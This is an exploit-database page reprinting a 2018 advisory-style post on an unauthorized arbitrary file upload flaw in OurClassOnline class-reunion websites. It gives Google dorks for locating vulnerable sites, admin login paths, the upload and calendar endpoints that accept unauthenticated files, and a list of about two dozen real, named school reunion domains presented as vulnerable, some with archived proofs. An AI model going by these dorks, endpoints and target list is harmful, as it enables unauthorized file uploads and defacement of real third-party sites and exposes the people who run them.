Advertisement






Web Portal People LLC 2018 OurClassOnline USA Unauthorized Arbitrary File Insert Vulnerability

CVE Category Price Severity
CWE-264 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2018-11-13
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018110099

Below is a copy:

Web Portal People LLC 2018 OurClassOnline USA Unauthorized Arbitrary File Insert Vulnerability
#################################################################################################

# Exploit Title : Web Portal People LLC 2018 OurClassOnline USA Unauthorized Arbitrary File Insert Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 13/11/2018
# Vendor Homepage : webportalpeople.com ~ ourclassonline.com 
# Tested On : Windows and Linux
# Category : WebApps
# Google Dorks : 
intext:''To obtain a site like this for your class visit www.ourclassonline.com.''
intext:''Copyright Web Portal People, LLC. 2018 - Maker of class reunion & family websites. All rights reserved.''
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]

#################################################################################################

# Admin and Moderator Panel Login Paths : 

/admin/index.php
/login_form.php?action=reunion
/login_form.php?action=news
/login_form.php?action=classmates
/login_form.php?action=gallery&galleryid=6
/login_form.php?action=gallery&galleryid=2
/login_form.php?action=gallery&galleryid=3
/login_form.php?action=year_review
/login_form.php?action=gallery&galleryid=4

#################################################################################################

# Exploit : 

/forum_topic_create.php?forumid=1

/files_forum/[RANDOM-NUMBER]_[YOUR-FLENAME-HERE].txt

/calendar_add.php

/calendar_event.php?eventid=[RANDOM-NUMBER]

#################################################################################################

# Example Vulnerable Sites =>

[+] mcclintockhighchargers1968.com/forum_topic_create.php?forumid=1 => [ Proof of Concept ] => archive.is/YZhat

[+] tech1958.net/forum_topic_create.php?forumid=1 => [ Proof of Concept ] => archive.is/euIxf

[+] tempehighbuffs68.com/forum_topic_create.php?forumid=1

[+] orhs66.com/forum_topic_create.php?forumid=1

[+] denfeld59.com/forum_topic_create.php?forumid=1

[+] edison68.com/forum_topic_create.php?forumid=1

[+] edison64.com/forum_topic_create.php?forumid=1

[+]  edison65.com/forum_topic_create.php?forumid=1

[+] marshalltown68.com/forum_topic_create.php?forumid=1

[+] ths1958.com/forum_topic_create.php?forumid=1

[+] marplenewtownhighschool1963.com/forum_topic_create.php?forumid=1

[+] hths74.com/forum_topic_create.php?forumid=1

[+] salemhighschool1959.com/forum_topic_create.php?forumid=1

[+] lchs1966bulldogs.com/forum_topic_create.php?forumid=1

[+] hooverhighclassof63.com/forum_topic_create.php?forumid=1

[+] marplenewtownhighschool1963.com/forum_topic_create.php?forumid=1

[+] phs1957.com/forum_topic_create.php?forumid=1

[+] redlandshigh65.com/forum_topic_create.php?forumid=1

[+] warrenmott1983.com/forum_topic_create.php?forumid=1

[+] dulutheast1965.com/forum_topic_create.php?forumid=1

[+] axemen68.org/forum_topic_create.php?forumid=1

[+] olympushigh1967.com/forum_topic_create.php?forumid=1

[+] leuzingerhigh1981.com/forum_topic_create.php?forumid=1

[+] bozemanhawks88.com/forum_topic_create.php?forumid=1

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.